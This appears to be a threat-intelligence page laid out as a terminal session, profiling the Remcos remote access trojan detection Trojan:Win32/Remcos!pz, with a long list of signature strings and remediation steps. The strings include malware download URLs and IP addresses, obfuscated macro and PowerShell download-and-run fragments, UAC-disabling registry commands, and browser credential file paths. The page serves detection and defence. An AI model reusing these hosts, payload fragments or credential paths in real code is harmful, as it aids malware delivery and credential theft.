user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Trojan:Win32/Remcos!pz
Trojan:Win32/Remcos!pz - Windows Defender threat signature analysis

Trojan:Win32/Remcos!pz - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win32/Remcos!pz
Classification:
Type:Trojan
Platform:Win32
Family:Remcos
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!pz
Packed or compressed to evade detection
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 32-bit Windows platform, family Remcos

Summary:

This is a concrete detection of Trojan:Win32/Remcos!pz, a highly dangerous Remote Access Trojan (RAT). Remcos RAT is known for its extensive surveillance capabilities, including screen capture, and can disable User Account Control (UAC) to facilitate further compromise and establish communication with command and control servers for data exfiltration and remote control.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - Remcos_Mutex_Inj (PEHSTR_EXT)
 - EnableLUA /t REG_DWORD /d 0 (PEHSTR_EXT)
 - getscrslist (PEHSTR_EXT)
 - screenshotdata (PEHSTR_EXT)
 - Breaking-Security.Net (PEHSTR_EXT)
 - Remcos_Mutex_Inj (PEHSTR)
 - REMCOS (PEHSTR_EXT)
 - Screenshots (PEHSTR_EXT)
 - remcos (PEHSTR_EXT)
 - Remcos (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Uninstall (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - zdvT_i1jso3v7MtW0/es.uugu.a//:sptth (PEHSTR_EXT)
 - gdead/dead-lyrics/ (PEHSTR_EXT)
 - China_Cat_Sunflower.txt (PEHSTR_EXT)
 - \shell\open\command (PEHSTR_EXT)
 - OpenAs_RunDLL (PEHSTR_EXT)
 - Test.thg (PEHSTR_EXT)
 - sfhjffkfhgfdjsrfhhddfhfffadsgfasfhsscffgdb (PEHSTR_EXT)
 -   = CreateObject("Msxml2.DOMDocument.3.0") (MACROHSTR_EXT)
 - Load "http://185.172.110.217/robx/remit.jpg (MACROHSTR_EXT)
 - Pspl.Create(Nxayp, Null, Null, mh0f5) (MACROHSTR_EXT)
 - C:\Users\Yak\Desktop\Alt_R66Draw\T___imgFig.pas (PEHSTR_EXT)
 - C:\Users\Yak\Desktop\Alt_R66Draw\T__RGroup.pas (PEHSTR_EXT)
 - C:\Users\Yak\Desktop\Alt_R66Draw\T__RUndo.pas (PEHSTR_EXT)
 - C:\Users\Yak\Desktop\Alt_R66Draw\T__RSelFrm.pas (PEHSTR_EXT)
 - C:\Users\Yak\Desktop\Alt_R66Draw\T__RCore.pas (PEHSTR_EXT)
 - davidemauri.it (PEHSTR_EXT)
 - opablo@gmail.com (PEHSTR_EXT)
 - Decompress (PEHSTR_EXT)
 - Compress (PEHSTR_EXT)
 -  = MVNID.OpenTextFile(OGlq + "\ZrTSy.vbs", 8, True) (MACROHSTR_EXT)
 - Dir(f5fg0e + "\ZrTSy.vbs") = "" Then (MACROHSTR_EXT)
 - Nursery_Management_System.signIn.resources (PEHSTR_EXT)
 - Nursery_Management_System.sign.resources (PEHSTR_EXT)
 - Nursery_Management_System.signUp.resources (PEHSTR_EXT)
 - Nursery_Management_System.Analytics.resources (PEHSTR_EXT)
 - Nursery_Management_System.Properties.Resources.resources (PEHSTR_EXT)
 - Nursery_Management_System.childDailyDetails.resources (PEHSTR_EXT)
 - Nursery_Management_System.adminPendingRequests.resources (PEHSTR_EXT)
 - \AppData\Roaming\remcos\ (PEHSTR_EXT)
 - \AppData\Roaming\Screenshots\ (PEHSTR_EXT)
 - get_SplashScreen1 (PEHSTR_EXT)
 - DbCommand (PEHSTR_EXT)
 - Lerlibro_INC.ucUsers.resources (PEHSTR_EXT)
 - //107.189.4.70/693.bin (PEHSTR_EXT)
 - Jioz.NewFileForm.resources (PEHSTR_EXT)
 - Jioz.PropertiesForm.resources (PEHSTR_EXT)
 - HttpWebResponse (PEHSTR_EXT)
 - %systemroot%\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe (PEHSTR_EXT)
 - ttps:// (PEHSTR_EXT)
 - BreakingSecurity.net (PEHSTR_EXT)
 - Remcos restarted by watchdog (PEHSTR_EXT)
 - Remcos v (PEHSTR_EXT)
 - SbieDll.dll (PEHSTR_EXT)
 - HARDWARE\ACPI\DSDT\VBOX__ (PEHSTR_EXT)
 - \SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 - //cdn.discordapp.com/attachments/ (PEHSTR_EXT)
 - \Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe (PEHSTR_EXT)
 - SOFTWARE\Borland\Delphi\RTL (PEHSTR_EXT)
 - cdn.discordapp.com (PEHSTR_EXT)
 - C:\Users\Public\Libraries\TEMP (PEHSTR_EXT)
 - amsl.Run "P" + mJJGM(fgfjhfgfg), 0 (MACROHSTR_EXT)
 - = mJJGM("B0A85DF40" + fjjsdfhl() + j00ffdgdf() + tter7fdg0() (MACROHSTR_EXT)
 - &Microsoft.VisualBasic.CompilerServices (PEHSTR)
 - 4System.Web.Services.Protocols.SoapHttpClientProtocol (PEHSTR)
 - outCompiled.exe (PEHSTR)
 - System.CodeDom.Compiler (PEHSTR)
 - System.Security (PEHSTR_EXT)
 - ShutDownDlg.dll (PEHSTR_EXT)
 - \Software\Microsoft\Internet Explorer\Main (PEHSTR_EXT)
 - RunDlg.dll (PEHSTR_EXT)
 - CheckIC.dll (PEHSTR_EXT)
 - Remote_Administration_Tool.Properties.Resources (PEHSTR_EXT)
 - CaptureScreenImage.Properties.Resources (PEHSTR_EXT)
 - VB_blackjack.My.Resources (PEHSTR_EXT)
 - zCom.resources (PEHSTR_EXT)
 - .tmp.exe (PEHSTR_EXT)
 - PrimeX.Tools.Properties.Resources (PEHSTR_EXT)
 - shutdowntimer.Properties.Resources (PEHSTR_EXT)
 - Video_Capture_DonK.Properties.Resources (PEHSTR_EXT)
 - Ddd.Resources.resources (PEHSTR_EXT)
 - BaseConfigHandler.My.Resources (PEHSTR_EXT)
 - Stub.g.resources (PEHSTR_EXT)
 - SQLTutorial.Resources.resources (PEHSTR_EXT)
 - ndtia_Live_Server.Resources (PEHSTR_EXT)
 - Cards_Interfaces.My.Resources (PEHSTR_EXT)
 - ReflectionExtensions.My.Resources (PEHSTR_EXT)
 - MiniCalc.Resources (PEHSTR_EXT)
 - GameProject.My.Resources (PEHSTR_EXT)
 - PM_FormsAvgCalc.Resources (PEHSTR_EXT)
 - PointOfSale.Properties.Resources (PEHSTR_EXT)
 - Graph.Properties.Resources (PEHSTR_EXT)
 - IdOps.My.Resources (PEHSTR_EXT)
 - FileZillaProject.My.Resources (PEHSTR_EXT)
 - WindowsApp2.My.Resources (PEHSTR_EXT)
 - WindowsApplication1.My.Resources (PEHSTR_EXT)
 - ShaharMarket.Resources (PEHSTR_EXT)
 - Coursework.My.Resources (PEHSTR_EXT)
 - FixAPix.Resources (PEHSTR_EXT)
 - Image_Editor.Resources (PEHSTR_EXT)
 - Codewords.Resources.resources (PEHSTR_EXT)
 - GameMaker.Resources (PEHSTR_EXT)
 - CDA.My.Resources (PEHSTR_EXT)
 - Coronovirus.Coronovirus (PEHSTR_EXT)
 - file:/// (PEHSTR_EXT)
 - exe.rtpoz/061860176029740319/910917017564740319/stnemhcatta/moc.ppadrocsid.ndc//:sptth (PEHSTR_EXT)
 - first.Properties.Resources (PEHSTR_EXT)
 - Page_Restore.My.Resources (PEHSTR_EXT)
 - Singleton_Vote_Manager.Properties.Resources.resources (PEHSTR_EXT)
 - Remcos restarted by watchdog! (PEHSTR_EXT)
 - ExceptionDispatch.Properties.Resources (PEHSTR_EXT)
 - GraphicsUtility.Properties.Resources (PEHSTR_EXT)
 - blue32_c.exe (PEHSTR_EXT)
 - FoxGameOfLife.My.Resources (PEHSTR_EXT)
 - tela_inicial.My.Resources (PEHSTR_EXT)
 - WaterBilingSystem.Main.resources (PEHSTR_EXT)
 - costura. (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - .compressed (PEHSTR_EXT)
 - diejc.dll (PEHSTR_EXT)
 - C:\TEMP\ns (PEHSTR_EXT)
 - ExecShell (PEHSTR_EXT)
 - %s%s.dll (PEHSTR_EXT)
 - money.Strategies (PEHSTR_EXT)
 - money.exe (PEHSTR_EXT)
 - .Definitions (PEHSTR_EXT)
 - .Attributes (PEHSTR_EXT)
 - .Properties (PEHSTR_EXT)
 - stub\UopyEx\achiiMe (PEHSTR_EXT)
 - JustChess.Properties (PEHSTR_EXT)
 - \kiichi\work\ImageResizeTest\geo-elevation.png (PEHSTR_EXT)
 - 127.0.0.1:8081 (PEHSTR_EXT)
 - OQDXkW<_(V?cqK.lJ>-*y&zv9prf8biYCFeMxBm6ZnG3H4OuS1UaI5TwtoA#Rs!,7d2@L^gNhj)EP$0 (PEHSTR)
 - UCOMIExpando (PEHSTR_EXT)
 - ComputeHash (PEHSTR_EXT)
 - PolTraget.vbp (PEHSTR_EXT)
 - students_and_employees.ToggleState (PEHSTR_EXT)
 - trevnoC.metsyS (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - /store2.gofile.io/download/ (PEHSTR_EXT)
 - FastFind.Properties.Resources (PEHSTR_EXT)
 - Sy!stem.Refl!ection.As!sembly (PEHSTR_EXT)
 - commdlg_FindReplace (PEHSTR_EXT)
 - Mqypdx\egc (PEHSTR_EXT)
 - WinHttpCrackUrl (PEHSTR_EXT)
 - Read Icon List for Delphi 3.0 (PEHSTR_EXT)
 - uplooder.net (PEHSTR_EXT)
 - wener/ gifnocpi (PEHSTR_EXT)
 - esaeler/ gifnocpi (PEHSTR_EXT)
 - laxyman.000webhostapp.com (PEHSTR_EXT)
 - .edom SOD ni nur eb tonnac margorp sihT! (PEHSTR_EXT)
 - coler. (PEHSTR_EXT)
 - crsr. (PEHSTR_EXT)
 - txet. (PEHSTR_EXT)
 - DllRegisterServer (PEHSTR_EXT)
 - LibrarySystem.Properties.Resources (PEHSTR_EXT)
 - exe.4ewrepooc (PEHSTR_EXT)
 - car_rental.Properties.Resources (PEHSTR_EXT)
 - moc.ppadrocsid.ndc//:sptth (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - BeeHiveManagementSystem.Properties.Resources (PEHSTR_EXT)
 - /stnemhcatta/moc.ppadrocsid.ndc//:sptth (PEHSTR_EXT)
 - gdgasfwq.gdgasfwq (PEHSTR_EXT)
 - http://trietlongvinhvien.info/.tmb/ (PEHSTR_EXT)
 - https://www.uplooder.net/img/image/40/e36bebd22260c03f3a40b6348976fa5b/WMI-Provider-Host.jpg (PEHSTR_EXT)
 - https://cdn.discordapp.com/attachments/932413459872747544/933098893019861042/Jdnpanki.bin (PEHSTR_EXT)
 - http://trietlongvinhvien.info//.tmb/ (PEHSTR_EXT)
 - EmlakOtomasyonu.Properties.Resources (PEHSTR_EXT)
 - exe.kcad/tdba/171.571.34.971//:ptth (PEHSTR_EXT)
 - transfer.sh/get/dXGcIL/bbddll.txt (PEHSTR_EXT)
 - transfer.sh/get/xwYA0C/ch.txt (PEHSTR_EXT)
 - Wp1.Form1.resources (PEHSTR_EXT)
 - telDir.Resources (PEHSTR_EXT)
 - S#q-}=6{)BuEV[GDeZy>~M5D/P&Q}7< (PEHSTR_EXT)
 - CompressionLevel (PEHSTR_EXT)
 - calina-crack.store/loader/uploads/services_Vxnwfiwc.bmp (PEHSTR_EXT)
 - 91.243.44.142/arx-777Ofdds_Suadocfq.png (PEHSTR_EXT)
 - uplooder.net/img/image/48/0eda3c83452f40cb3b4ba01965a35433/Fkned.jpg (PEHSTR_EXT)
 - vkcgroups.com/loader/uploads/Quote_Wdmahgcs.jpg (PEHSTR_EXT)
 - x.rune-spectrals.com/loader/uploads/GxvGhjKm_Gxvwanla.jpg (PEHSTR_EXT)
 - 91.243.44.142/pl-Ukxamliyg_Wqxbcfti.png (PEHSTR_EXT)
 - kotadiainc.com (PEHSTR_EXT)
 - philox.ddns.net (PEHSTR_EXT)
 - SmallestEnclosingCircle.Properties.Resources (PEHSTR_EXT)
 - CompressionMode (PEHSTR_EXT)
 - "powe" + "rs" + Range("F100").Value (MACROHSTR_EXT)
 - ggg.ExecMethod_(HByn(), f8df00) (MACROHSTR_EXT)
 - "C" + ActiveSheet.PageSetup.LeftFooter + fjjdf() (MACROHSTR_EXT)
 - CreateObject(ActiveSheet.PageSetup.CenterHeader) (MACROHSTR_EXT)
 - ZIARb().Exec kogH3 (MACROHSTR_EXT)
 - For Each ZvFDlwx In ActiveWorkbook.BuiltinDocumentProperties (MACROHSTR_EXT)
 - = "p" + ActiveSheet.PageSetup.CenterFooter (MACROHSTR_EXT)
 - cAlHep.Open (rNJoz + "\afJNP.js") (MACROHSTR_EXT)
 - ActiveSheet.OLEObjects(1).Copy (MACROHSTR_EXT)
 - MEDIA\GFX\LittleDuck.bmp (PEHSTR_EXT)
 - MEDIA\GFX\GaugeKill.bmp (PEHSTR_EXT)
 - .itext (PEHSTR_EXT)
 - Cortez.Properties.Resources (PEHSTR_EXT)
 - ='eW.teN tc' + 'ejbO-weN(';$Ax1='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/ababila/kt.denik//:ptth''( (MACROHSTR_EXT)
 - bdfdf=t8g0f.open(v0df+"\citwz.bat")endfunctionfunctionrev(s)dimpforp=len(s)to1step-1rev=rev&mid(s,p,1)nextendfunctionfunctionikfwq() (MACROHSTR_EXT)
 - omwmlf=pathy+"\citwz.bat"'youcanspecifyherethetextfilenameyouwanttocreate (MACROHSTR_EXT)
 - =range("a1").valueendfunction (MACROHSTR_EXT)
 - .self.invokeverb"pa"+"ste"endfunctionprivatefunction (MACROHSTR_EXT)
 - .open( (MACROHSTR_EXT)
 - .j"+"s")endsubsub (MACROHSTR_EXT)
 - constuser_profile=&h28&activesheet.oleobjects(1).copyset (MACROHSTR_EXT)
 - //209.127.20.13/ (MACROHSTR_EXT)
 - .xm*w (SNID)
 - =createobject(adlnw())setwyyss=iwxn.methods_(activesheet.pagesetup.leftheader)._ (MACROHSTR_EXT)
 - ggg,f8df00)setsjtn=ggg.execmethod_(zcfw(),f8df00)endfunctionprivatefunctionfjjdf()fjjdf= (MACROHSTR_EXT)
 - .methods_(activesheet.pagesetup.leftheader)._ (MACROHSTR_EXT)
 - +fjjdf()endfunctionfunctionfkldf(ggg,f8df00)setsjtn=ggg.execmethod_( (MACROHSTR_EXT)
 - ://loft.london/vendor/phpunit/phpunit/src/Util/PHP/oder.exe (MACROHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - Othubpm.exe (PEHSTR_EXT)
 - rundll32.exe %sadvpack.dll,DelNodeRunDLL32 (PEHSTR_EXT)
 - rundll32.exe %s,InstallHinfSection %s 128 %s (PEHSTR_EXT)
 - cmd /c cmd < (PEHSTR_EXT)
 - .htm & ping -n 5 localhost (PEHSTR_EXT)
 - Command.com /c %s (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\RunOnce (PEHSTR_EXT)
 - 214da9226666a1.Resources.resources (PEHSTR_EXT)
 - SimulationRemonteeSki.T1.resources (PEHSTR_EXT)
 - Invoke-WebRequest -Uri ""https://transfer.sh/get/qIND4E/Rchnpc.exe"" -OutFile (MACROHSTR_EXT)
 - 80.66.75.36 (PEHSTR_EXT)
 - cmd /c cmd < Preferences.vsd & ping -n 5 localhost (PEHSTR_EXT)
 - LkXE.exe (PEHSTR_EXT)
 - 2023CryptsDone\DarkModeForms\obj\Debug\DarkModeForms.pdb (PEHSTR_EXT)
 - _Header_dllink (PEHSTR_EXT)
 - war.pdb (PEHSTR_EXT)
 - FileRenamer\obj\Debug\FIco.pdb (PEHSTR_EXT)
 - RestaurantApp.AccountControl (PEHSTR_EXT)
 - RestaurantApp.ContactControl (PEHSTR_EXT)
 - RestaurantApp.DefaultControl (PEHSTR_EXT)
 - RestaurantApp.LoginControl (PEHSTR_EXT)
 - RestaurantApp.MenuControl (PEHSTR_EXT)
 - RestaurantApp.NutritionControl (PEHSTR_EXT)
 - RestaurantApp.RestaurantControl (PEHSTR_EXT)
 - RestaurantApp.WelcomeControl (PEHSTR_EXT)
 - SolaraBootstrapper\bin\Release\Bootstrapper.pdb (PEHSTR_EXT)
 - sgfhjffffgdhjsrfhddfhfffaddsfsfsscfgdb (PEHSTR_EXT)
 - CRM02.Properties.Resources.resources (PEHSTR_EXT)
 - CRM02.Properties (PEHSTR_EXT)
 - sfhjffkfhgfdjsrfhdfdfhfffadsgfahsscffgdb (PEHSTR_EXT)
 - WindowsFormsApp50.Properties.Resources.resource (PEHSTR_EXT)
 - Documents\CryptoObfuscator_Output\BHHHG66.pdb (PEHSTR_EXT)
 - QnovDRkgfnoOaikMMsqL.res (PEHSTR_EXT)
 - sgfhjffffgdhjsrfhddfhfffadfsfsscfgdb (PEHSTR_EXT)
 - RandomMaker.Properties.Resources (PEHSTR_EXT)
 - 5Assembled.Program (PEHSTR_EXT)
 - Njswpsg (PEHSTR_EXT)
 - %homedrive%\eegv (PEHSTR_EXT)
 - ;r. X( (SNID)
 - :/Users/Admin/AppData/Roaming/installer/installer/main.go (PEHSTR_EXT)
 - geoplugin.net/json.gp (PEHSTR_EXT)
 - sysinfo.txt (PEHSTR_EXT)
 - update.vbs (PEHSTR_EXT)
 - fso.DeleteFile (PEHSTR_EXT)
 - WNHBNMKL.exe (PEHSTR_EXT)
 - cdn.discordapp.com/attachments/ (PEHSTR_EXT)
 - Zptcs.exe (PEHSTR_EXT)
 - Failed to execute the .bat file (PEHSTR_EXT)
 - cmd/Cstart/B (PEHSTR_EXT)
 - jenkins-workspace\workspace\client-builder-product\Build\Win32\Release\utorrent.pdb (PEHSTR_EXT)
 - =[/"{ (SNID)
 - MeshViewer.MeshViewer.resources (PEHSTR_EXT)
 - NotThere.Properties.Resources.resources (PEHSTR_EXT)
 - https://github.com/Saad888/AutoSynthesis/issues (PEHSTR_EXT)
 - MagicBar.Properties.Resources (PEHSTR_EXT)
 - https://groundbreakingsstyle.com/wp-content/nanofolder/img-files/VFLient.vas (PEHSTR_EXT)
 - OxyPlotting.EWGibraltar (PEHSTR_EXT)
 - C:\Users\Administrator\Desktop\Outputs\YgZBrsLNe.pdb (PEHSTR_EXT)
 - AsnanyDentalClinic.Properties (PEHSTR_EXT)
 - dobbelteksponeringer\Microsoft\Windows\horizontical\Uninstall\spalteteksternes (PEHSTR_EXT)
 - vandrerkortet\Angrebstidspunktet\indonesiens (PEHSTR_EXT)
 - unsped\akkorderingernes (PEHSTR_EXT)
 - schtasks /create /tn "Alis Cloud" /tr " (PEHSTR_EXT)
 - X{gJ. (SNID)
 - w124728_New_Text_Document.txt (PEHSTR_EXT)
 - https://imgurl.ir/download.php (PEHSTR_EXT)
 - Project_Calendar.Properties.Resources.resources (PEHSTR_EXT)
 - Kronus.exed (PEHSTR_EXT)
 - Kronus.dll (PEHSTR_EXT)
 - bcrypt.dll (PEHSTR_EXT)
 - FManagerApp.Properties.Resources (PEHSTR_EXT)
 - CS50_Medical_App.Welcome.resources (PEHSTR_EXT)
 - 2023CryptsDone\drwk (PEHSTR_EXT)
 - exporterWorker_RunWorkerCompleted (PEHSTR_EXT)
 - lameExeDownloadSite (PEHSTR_EXT)
 - pwsgl3.Properti (PEHSTR_EXT)
 - reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (PEHSTR_EXT)
 - User Data\Default\Cookies (PEHSTR_EXT)
 - CreateObject("WScript.Shell").Run "cmd (PEHSTR_EXT)
 - \sysinfo.txt (PEHSTR_EXT)
 - SOFTWARE\Microsoft\Windows NT\CurrentVersion (PEHSTR_EXT)
 - Remcos Agent initialized (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Default\Login Data (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Default\Cookies (PEHSTR_EXT)
 - AppData\Roaming\Mozilla\Firefox\Profiles\ (PEHSTR_EXT)
 - \logins.json (PEHSTR_EXT)
 - \key3.db (PEHSTR_EXT)
 - ToDoList.Properties.Resources.resources (PEHSTR_EXT)
 - Projektni_zadatak.Properties.Resources (PEHSTR_EXT)
 - AttendanceTracker.Properties.Resources.resources (PEHSTR_EXT)
 - QLBH.Properties.Resources.resources (PEHSTR_EXT)
 - PitchAnalytics.Properties.Resources (PEHSTR_EXT)
 - Book_Mgt_System.Properties.Resources.resources (PEHSTR_EXT)
 - Execute (PEHSTR_EXT)
 - Slicer.Properties.Resources.resources (PEHSTR_EXT)
 - Cycle_Jump_Game.Properties.Resources.resources (PEHSTR_EXT)
 - StormCast.Properties.Resources.resources (PEHSTR_EXT)
 - 32\A.DLL (PEHSTR_EXT)
 - SmartNote.Properties.Resources (PEHSTR_EXT)
 - CSVViewer.Forms.MainForm.resource (PEHSTR_EXT)
 - Source_code.Properties.Resources (PEHSTR_EXT)
 - HostPinger.Properties.Resources (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: 1fd111954e3eefeef07557345918ea6527898b741dfd9242ff4f5c2ddceaa5e9.exe
1fd111954e3eefeef07557345918ea6527898b741dfd9242ff4f5c2ddceaa5e9
14/01/2026
Remediation Steps:
Immediately isolate the infected system to prevent further compromise. Perform a comprehensive full system scan with updated antivirus software to ensure all malicious components are removed. Investigate for persistence mechanisms, credential theft, and data exfiltration, and consider a full system reimage if complete eradication cannot be confirmed. Reset all user credentials used on the compromised system.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 14/01/2026. Do you want to analyze it again?
$ ls available-commands/
user@threatcheck.sh:~$